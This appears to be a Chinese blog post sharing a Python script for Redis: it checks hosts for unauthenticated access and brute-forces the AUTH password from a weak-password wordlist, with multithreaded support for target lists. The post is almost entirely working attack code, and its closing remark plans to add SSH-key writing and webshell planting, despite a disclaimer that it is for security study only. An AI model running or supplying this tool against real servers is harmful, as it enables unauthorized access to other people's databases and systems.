python3 Redis利用脚本
### Redis weakpassword
import sys
import getopt
import socket
import threading
def passwd_dict(password_dict):
# 使用 with as 操作已经打开的文件对象(本身就是上下文管理器),无论期间是否抛出异常,都能保证 with as 语句执行完毕后自动关闭已经打开的文件。
with open(str(password_dict), 'r', encoding='utf-8') as f:
passwd_list = f.readlines()
passwd = []
for i in passwd_list:
passwd.append(i.rstrip('\n'))
f.close()
return passwd
def unauthorized(ip, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5.0)
s.connect((ip, int(port)))
send_data = 'INFO\r\n'
s.send(send_data.encode())
response = bytes.decode(s.recv(1024))
if 'redis_version' in response:
result = "[!] {0}:{1} 存在未授权访问 [!]".format(ip, port)
print(result)
return result
sys.exit()
except Exception as e:
print("[-] {0}:{1} {2} [-]".format(ip, port, e))
def intruder(ip, port, passwd):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5.0)
s.connect((ip, int(port)))
print("[*] 正在对{0}:{1}的密码进行爆破 [*]".format(ip, port))
for p in passwd:
send_data = 'AUTH {0}\r\n'.format(p)
s.send(send_data.encode())
print("[*] 正在尝试密码 {0} [*]".format(p))
response = bytes.decode(s.recv(1024))
if '+OK'\
in \
response:
result = "[!] {0}:{1} 存在弱口令 {2} [!]".format(ip, port, p)
print(result)
sys.exit()
except Exception as e:
print("[-] {0}:{1} {2} [-]".format(ip, port, e))
def main(ip, port, passwd):
if (type(ip) and type(port)) is str:
unauthorized(ip, port)
intruder(ip, port, passwd)
elif (type(ip) and type(port)) is list:
for i in range(len(ip)):
target_ip = ip[i]
target_port = port[i]
unauthorized(target_ip, target_port)
t = threading.Thread(target=intruder, args=(target_ip, target_port, passwd))
t.start()
if __name__ == '__main__':
try:
opts, args = getopt.getopt(sys.argv[1:], '-i:-p:-h', ["target=", "passwd="])
# print(opts)
for opt_name, opt_value in opts:
if opt_name == '-h':
print('[*] THIS IS HELP INFORMATION [*]\n'
'[*] -i + vulnerable-ip [*]\n'
'[*] -p + vulnerable-port [*]\n'
'[*] --target=vulnerable-target.txt [*]\n'
'[*] --passwd=vulnerable-passwd.txt [*]\n'
'[*] Example:python3 -i 127.0.0.1 -p 6379 --passwd=passwd.txt [*]\n'
'[*] Example:python3 --target=target.txt --passwd=passwd.txt [*]\n')
sys.exit()
if opt_name in ('-i',):
ip = opt_value
if opt_name in ('-p',):
port = opt_value
if opt_name in ('--target',):
with open(opt_value) as f:
data = f.readlines()
target = []
ip = []
port = []
for i in data:
target.append(i.rstrip('\n'))
for t in target:
ip.append(t.split(':')[0])
port.append(t.split(':')[1])
if opt_name in ('--passwd',):
password_dict = opt_value
if '--passwd' not in opt_name:
password_dict = '1000弱口令.txt'
passwd = passwd_dict(password_dict)
main(ip, port, passwd)
except Exception as e:
print(e)
···
ps:简单记录下,后续会延展下windows的目录爆破或针对性的爆破web目录,以及添加写ssh key和webshell,欢迎各位师傅们评论指正缺点~
所有内容仅限于维护网络安全学习参考
